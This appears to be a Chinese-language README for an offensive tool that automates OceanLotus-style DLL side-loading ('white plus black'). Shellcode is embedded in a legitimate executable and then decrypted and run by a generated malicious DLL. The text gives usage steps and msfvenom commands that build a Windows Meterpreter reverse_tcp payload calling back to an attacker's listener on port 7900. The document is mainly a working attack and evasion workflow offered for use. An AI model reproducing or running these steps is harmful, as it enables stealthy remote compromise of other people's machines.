模仿APT组织白加黑的攻击方式,如海莲花样本追踪与分析(二)海莲花APT分析-白加黑 本工具可以根据白加黑样本模板自动生成白加黑的工具,dll由go在线编译
shellcode会被写入到白可执行文件中,dll会从白文件中读取shellcode解密并执行。
输入shellcode,选择好白加黑的模板(注意对应架构),32位选择x86,64位选择x64。每次生成都会生成一个独一无二的文件。
生成的文件会包含:
生成后门 - Payload Generator
生成C语言格式
保存文件后复制生成的payload.c
中所有的内容
点击生成即可。
生成64位的payload c语言文件
msfvenom -p windows/x64/meterpreter/reverse_tcp -f c -o payload.c LHOST=x.x.x.x LPORT=7900
或者直接生成hex格式(推荐)
msfvenom -p windows/x64/meterpreter/reverse_tcp -f hex -o payload.c LHOST=x.x.x.x LPORT=7900
复制payload.c文件到shellcode文本框即可
每次在线生成会启动一个docker编译,可能比较慢,耐心等待。。
请注意选择架构信息,32位shellcode选择x86
的模板,64位shellcode选择x64
的模板。